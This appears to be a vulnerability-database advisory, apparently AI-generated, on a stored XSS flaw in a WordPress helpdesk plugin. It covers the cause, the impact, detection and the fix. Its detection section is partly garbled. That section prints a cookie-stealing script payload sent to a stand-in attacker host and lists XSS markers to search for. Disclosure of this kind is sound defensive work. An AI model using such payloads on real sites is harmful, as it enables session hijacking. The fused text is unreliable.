
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-9343 is a Stored Cross-Site Scripting (XSS) vulnerability in the ELEX WordPress HelpDesk & Customer Ticketing System plugin for WordPress. It affects all versions up to and including 3.3.4, allowing unauthenticated attackers to inject arbitrary web scripts via ticket subjects. The vulnerability was published on December 21, 2025, and assigned a CVSS v3.1 base score of 7.2 (High) (Wordfence, Red Hat CVE).
The root cause is insufficient input sanitization and output escaping when handling ticket subject fields submitted by users (CWE-79: Improper Neutralization of Input During Web Page Generation). Because the plugin fails to sanitize or escape ticket subject data before rendering it in the WordPress admin interface, an unauthenticated attacker can craft a malicious ticket submission containing JavaScript payloads. The injected script is stored server-side and executes in the browser of any user (including administrators) who views the affected page, making this a persistent (stored) XSS attack with a changed scope (Wordfence, ENISA EUVD).
Successful exploitation allows unauthenticated attackers to execute arbitrary JavaScript in the context of any user who views the injected ticket page, including site administrators. This can lead to session hijacking, credential theft, unauthorized administrative actions (such as creating rogue admin accounts or installing malicious plugins), and defacement of the WordPress site. The changed scope in the CVSS vector reflects that the impact extends beyond the plugin itself to the broader WordPress environment (Wordfence, ENISA EUVD).
wp-content/plugins/elex-helpdesk-customer-support-ticket-system/readme.txt.<script>document.location='https://attacker.com/steal?c='+document.cookie</script>./wp-admin/admin-post.php or the plugin's ticket creation URL) containing HTML/JavaScript tags in the subject parameter.<script>, javascript:, onerror=, or similar XSS payloads in the ticket subject fields of the plugin's database table (typically wp_elex_helpdesk_tickets or similar).Users should update the ELEX WordPress HelpDesk & Customer Ticketing System plugin to version 3.3.5 or later, which addresses the insufficient input sanitization and output escaping issues. The fix is reflected in the plugin's changelog on the WordPress.org repository (WordPress Trac). As a temporary workaround, site administrators can restrict public access to the ticket submission form or require authentication to submit tickets, reducing the unauthenticated attack surface. Deploying a Web Application Firewall (WAF) with XSS filtering rules can also help detect and block malicious payloads in the interim.
Wordfence, which discovered and reported the vulnerability, included it in their weekly WordPress vulnerability report covering December 15, 2025 to January 4, 2026 (Wordfence Blog). The vulnerability was also picked up by automated security alert services including RedPacket Security and shared on social media platforms such as Bluesky and Mastodon, reflecting routine community awareness activity rather than significant concern (RedPacket Security).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."